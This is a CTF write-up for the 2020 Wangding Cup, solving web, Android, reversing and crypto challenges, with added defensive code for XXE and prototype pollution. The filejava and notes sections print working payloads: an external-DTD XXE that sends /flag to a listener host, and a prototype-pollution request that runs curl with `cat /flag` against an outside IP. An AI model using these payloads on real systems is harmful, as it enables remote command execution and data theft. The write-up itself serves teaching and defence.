2020wdb_Wp

2020 Second "Wangding Cup" (网鼎杯) Cyber Security Competition, Qinglong Division: writeup

[TOC]

0x00 Misc Sign-in

Steps:

Answer 15 questions correctly and the flag is printed in the browser console.

flag:

0x01 AreUSerialz

Steps:

```php
<?php
// Build the object the challenge expects and print its serialized form;
// that string is what gets submitted to the application's unserialize() input.
class FileHandler
{
    public $op = 2;
    public $filename = "flag.php";
}
$a = new FileHandler();
echo serialize($a);
```

Output:

O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";}
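To make the string above readable without running PHP, here is a minimal re-implementation of PHP's serialize() format in Python. It is an added example, not the challenge's or the author's code, and it goes slightly beyond the page: besides the public properties used above it also encodes protected and private property names the way PHP does (with NUL bytes), which is what such strings look like when they appear in request logs. `PHPObject`, `php_serialize` and the visibility mapping are names chosen here.

```python
class PHPObject:
    """A PHP object to serialize: class name, property values and, optionally,
    a per-property visibility ('public' by default, 'protected' or 'private')."""

    def __init__(self, class_name, props, visibility=None):
        self.class_name = class_name
        self.props = props
        self.visibility = visibility or {}


def _php_string(s):
    # PHP counts string length in bytes, not characters.
    return f's:{len(s.encode())}:"{s}";'


def _mangled_name(obj, name):
    # PHP mangles non-public property names with NUL bytes:
    #   protected -> "\0*\0name", private -> "\0ClassName\0name"
    vis = obj.visibility.get(name, "public")
    if vis == "public":
        return name
    if vis == "protected":
        return f"\x00*\x00{name}"
    if vis == "private":
        return f"\x00{obj.class_name}\x00{name}"
    raise ValueError(f"unknown visibility {vis!r}")


def php_serialize(value):
    """Encode a Python value the way PHP's serialize() would."""
    if value is None:
        return "N;"
    if isinstance(value, bool):          # must come before int (bool is an int subclass)
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        return _php_string(value)
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in items)
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PHPObject):
        body = "".join(
            _php_string(_mangled_name(value, name)) + php_serialize(v)
            for name, v in value.props.items()
        )
        return f'O:{len(value.class_name)}:"{value.class_name}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"cannot serialize {type(value).__name__}")


if __name__ == "__main__":
    # Reproduces the string produced by the PHP snippet above.
    print(php_serialize(PHPObject("FileHandler", {"op": 2, "filename": "flag.php"})))
    # Same object with a protected property, showing the NUL-byte mangling.
    print(repr(php_serialize(PHPObject("FileHandler", {"op": 2}, {"op": "protected"}))))
```

The `O:<len>:"<class>"` prefix is the part worth matching on when reviewing input validation or logs: user-controlled data that unserialize() accepts with that prefix is the precondition for this whole class of bug.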

flag:

flag{06c43628-fc7a-480b-b68d-0386f00ab0df}

0x02 filejava

Steps:

The application has an arbitrary file read, but /flag cannot be read directly.
Try reading ../../../web.xml
to find the package name and the servlet name.
It then turns out the uploaded file name has to start with excel-.

CVE-2014-3529 (XXE in Apache POI's OOXML handling)
https://xz.aliyun.com/t/6996
[Content_Types].xml:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://vpsip/file.dtd">
%remote;%int;%send;
]>
```

Host file.dtd on a VPS:

```dtd
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://vpsip:9999?p=%file;'>">
```

Listen on port 9999 and the flag arrives in the request.
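From the defending side, the cheapest gate in front of a library that parses uploaded OOXML is to refuse any package whose XML parts carry a DOCTYPE or ENTITY declaration at all, since a legitimate [Content_Types].xml never needs one. The following is an added example, not the challenge's code: it builds two small spreadsheet-like zip packages in memory (constructed samples; the hostile one reuses the [Content_Types].xml from above) and scans every XML part. `find_xml_doctypes`, `is_safe_to_parse` and `build_package` are names chosen here.

```python
import io
import re
import zipfile

# Declarations that have no business in an OOXML part about to be parsed.
ENTITY_DECL = re.compile(rb"<!DOCTYPE\b|<!ENTITY\b", re.IGNORECASE)


def find_xml_doctypes(ooxml_bytes):
    """Scan every XML part of an OOXML (zip) package and return
    {part_name: [declarations found]} for parts carrying DOCTYPE/ENTITY."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as zf:
        for name in zf.namelist():
            # .rels parts are XML too and are parsed by OOXML libraries.
            if not name.lower().endswith((".xml", ".rels")):
                continue
            hits = ENTITY_DECL.findall(zf.read(name))
            if hits:
                findings[name] = [h.decode("ascii").upper() for h in hits]
    return findings


def is_safe_to_parse(ooxml_bytes):
    """Gate to run before handing an upload to an OOXML parser."""
    return not find_xml_doctypes(ooxml_bytes)


def build_package(content_types_xml):
    """Minimal zip with the given [Content_Types].xml (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types_xml)
        zf.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
    return buf.getvalue()


BENIGN = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'
)

# The [Content_Types].xml from the writeup: an external DTD is pulled in
# through a parameter entity (host "vpsip" as written there).
HOSTILE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<!DOCTYPE convert [\n'
    '<!ENTITY % remote SYSTEM "http://vpsip/file.dtd">\n'
    '%remote;%int;%send;\n'
    ']>\n'
)

if __name__ == "__main__":
    print(find_xml_doctypes(build_package(BENIGN)))   # {}
    print(find_xml_doctypes(build_package(HOSTILE)))  # {'[Content_Types].xml': ['<!DOCTYPE', '<!ENTITY']}
```

The scan is a first line only; the parser itself should still be configured to disallow DTDs (for Java's StAX that is the `XMLInputFactory.SUPPORT_DTD` property set to false), and the upload directory should not be readable through the file-read path the writeup started from.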

flag:

0x03 notes

Steps:

CVE-2019-10795

undefsafe < 2.0.3 is vulnerable to prototype pollution.

In the challenge, undefsafe(this.note_list, id + '.author', author); is the call that allows the prototype chain to be polluted.

Sending the payload {"id":"__proto__","author":"curl 47.102.102.31:9999","raw":"curl 47.102.102.31:9999"} to /edit_note triggers the pollution.

Visiting /status and debugging locally confirms that Object was polluted successfully.


Finally, use the payload

```json
{"id":"__proto__","author":"curl 47.102.102.31:9999/?a=`cat /flag`","raw":"curl 47.102.102.31:9999/`cat /flag`"}
```

and the listening server receives the flag.
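What makes this case instructive is that the dangerous token arrives as a value (`id`), not as a key: the application itself glues it into the dotted path `id + '.author'`. Any defence therefore has to look at path segments, not just JSON keys. The block below is an added example, not the application's or undefsafe's code: `safe_set_path` is a dotted-path setter that refuses the segments capable of reaching the prototype (what a fixed library must do), and `find_pollution_indicators` is request-side detection that flags both such keys and string values that would become such segments. Both names and the sample bodies (with a placeholder host) are constructed here.

```python
import json

# Segments that let a dotted-path setter climb onto Object.prototype in JS.
FORBIDDEN_SEGMENTS = {"__proto__", "constructor", "prototype"}


def safe_set_path(root, path, value):
    """Set root[a][b]...[z] = value for path 'a.b...z', creating intermediate
    dicts, but refuse any segment that could rewrite the prototype chain."""
    segments = path.split(".")
    for seg in segments:
        if seg == "" or seg in FORBIDDEN_SEGMENTS:
            raise ValueError(f"refusing path segment {seg!r}")
    node = root
    for seg in segments[:-1]:
        node = node.setdefault(seg, {})
        if not isinstance(node, dict):
            raise TypeError(f"cannot descend into non-object at {seg!r}")
    node[segments[-1]] = value
    return root


def find_pollution_indicators(obj, path=""):
    """Walk decoded JSON and return locations of forbidden keys, and of string
    values that would contribute a forbidden segment to a dotted path."""
    hits = []
    if isinstance(obj, dict):
        for key, val in obj.items():
            here = f"{path}.{key}" if path else key
            if key in FORBIDDEN_SEGMENTS:
                hits.append(f"key {here}")
            hits.extend(find_pollution_indicators(val, here))
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            hits.extend(find_pollution_indicators(val, f"{path}[{i}]"))
    elif isinstance(obj, str):
        if FORBIDDEN_SEGMENTS.intersection(obj.split(".")):
            hits.append(f"value {path}")
    return hits


def check_request_body(raw):
    """Indicators for a raw JSON request body; non-JSON bodies yield none."""
    try:
        body = json.loads(raw)
    except ValueError:
        return []
    return find_pollution_indicators(body)


# Constructed sample bodies modelled on the writeup's /edit_note requests.
NORMAL_BODY = '{"id":"note1","author":"alice","raw":"hello"}'
POLLUTING_BODY = '{"id":"__proto__","author":"curl vpsip:9999","raw":"curl vpsip:9999"}'

if __name__ == "__main__":
    print(check_request_body(NORMAL_BODY))      # []
    print(check_request_body(POLLUTING_BODY))   # ['value id']
    print(safe_set_path({}, "note1.author", "alice"))
    try:
        safe_set_path({}, "__proto__.author", "x")
    except ValueError as e:
        print("blocked:", e)
```

Python dicts have no prototype, so `safe_set_path` cannot itself be polluted; it models the segment check the JavaScript setter needs. In the real fix the check belongs inside the library, and the request-side scan is only an early signal for logging and alerting.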

flag:


0x04 bang

Steps:

Opening the APK in jadx shows it is protected with the Bangcle (邦邦) packer.

Start frida-server on the phone and use the unpacking tool https://github.com/hluwa/FRIDA-DEXDump on the PC to dump the DEX in one step.

After unpacking, open the dumped dex in jadx and the flag is right there.

flag:

flag{borring_things}

0x05 Re_signal

Steps:

Work backwards from the values in the v4 array, undoing each byte's transformation.

```python
#!/usr/bin/env python3
# Values read from the v4 array in the binary; each byte is undone below.
# The original script was written for Python 2, where "/" on integers is
# integer division; "//" keeps the same result under Python 3.
a = [0x22, 0x3f, 0x34, 0x32, 0x72, 0x33, 0x18, 0xA7, 0x31, 0xF1, 0x28, 0x84, 0xC1, 0x1E, 0x7A]
b = ''
b += chr((a[0] + 5) ^ 0x10) + chr((a[1] // 3) ^ 0x20) + chr(a[2] + 3) + chr((a[3] ^ 4) - 1) + chr((a[4] + 0x21) // 3) + \
     chr(a[5] + 2) + chr((a[6] + 0x20) ^ 9) + chr((a[7] ^ 0x24) - 0x51) + chr(a[8]) + chr((a[9] - 0x25) // 2) + \
     chr((a[10] ^ 0x41) - 0x36) + chr(a[11] - 0x20) + chr((a[12] - 0x25) // 3) + chr((a[13] + 0x20) ^ 9) + chr(a[14] - 0x42)
print(b)   # 757515121f3d478
```

flag:

flag{757515121f3d478}

0x06 joker

Steps:

A simple XOR.

payload:

```python
# IDAPython (Python 2 at the time, hence the "L" suffix and str + bytes concatenation).
# Read 19 bytes from the debugged process at 0x403040 (stride 4), XOR each with the
# constant key, then append the five trailing bytes from the XOR of two constants.
import base64
import idaapi

"".join([chr(ord(b'hahahaha_do_you_find_me?'[i]) ^ ord(idaapi.dbg_read_memory(0x403040 + 4 * i, 1))) for i in range(19)]) + base64.b16decode("%02X" % (0x4747474747L ^ 0x257470263A))
```

flag:

flag{d07abccf8a410cb37a}

0x07 Boom

Steps:

Open the file. First the md5 works out to en5oy, then solve the three-variable cubic equation, and finally the quadratic equation in one variable; together they give the flag.

flag:

flag{en5oy_746831_89127561}

0x08 you raise me up

Steps:

From the code c = pow(m, bytes_to_long(flag), n) this is a discrete logarithm problem: we need to recover bytes_to_long(flag).
Since it is a discrete log, use sagemath's discrete_log() function directly.
Construct the script as follows:

Then convert the result to a string to get the flag:
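As an added example (not the author's sagemath script), the same two steps with the Python standard library alone: a baby-step giant-step discrete logarithm followed by the long-to-bytes conversion. It only works because the parameters are constructed to be tiny: the modulus n = 2^31 - 1 (a Mersenne prime), the base m = 7 (a primitive root of that prime) and a three-byte "flag" are all assumptions made here for the demonstration; the challenge's real n, m and c are not on the page. `bsgs` and `recover_flag` are names chosen here.

```python
from math import isqrt


def bytes_to_long(b):
    return int.from_bytes(b, "big")


def long_to_bytes(x):
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def bsgs(base, target, modulus, order=None):
    """Smallest x with base**x == target (mod modulus), or None if none exists
    below `order`.  Baby-step giant-step: O(sqrt(order)) time and memory."""
    if order is None:
        order = modulus - 1              # group order for a prime modulus
    m = isqrt(order) + 1                 # m*m >= order, so every x < order is covered
    baby = {}
    e = 1
    for j in range(m):                   # baby steps: base^j for 0 <= j < m
        baby.setdefault(e, j)            # keep the smallest j for each value
        e = e * base % modulus
    step = pow(base, -m, modulus)        # base^(-m), modular inverse (Python 3.8+)
    gamma = target % modulus
    for i in range(m):                   # giant steps: target * base^(-i*m)
        if gamma in baby:
            return i * m + baby[gamma]   # target == base^(i*m + j)
        gamma = gamma * step % modulus
    return None


def recover_flag(m, c, n):
    """Undo c = pow(m, bytes_to_long(flag), n) when n is small enough for BSGS."""
    x = bsgs(m, c, n)
    if x is None:
        raise ValueError("no discrete logarithm found")
    assert pow(m, x, n) == c             # sanity check before decoding
    return long_to_bytes(x)


if __name__ == "__main__":
    n = 2**31 - 1                        # constructed: Mersenne prime
    m = 7                                # constructed: primitive root mod n
    flag = b"wdb"                        # constructed three-byte "flag"
    c = pow(m, bytes_to_long(flag), n)
    print(recover_flag(m, c, n))         # b'wdb'
```

The sqrt(order) cost is the whole story of this challenge type: the exponent is recoverable because the modulus (or the group order, when it is smooth) is far too small for the exponent to hide in, which is exactly the property a real deployment must rule out.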

flag:

flag{5f95ca93-1594-762d-ed0b-a9139692cb4a}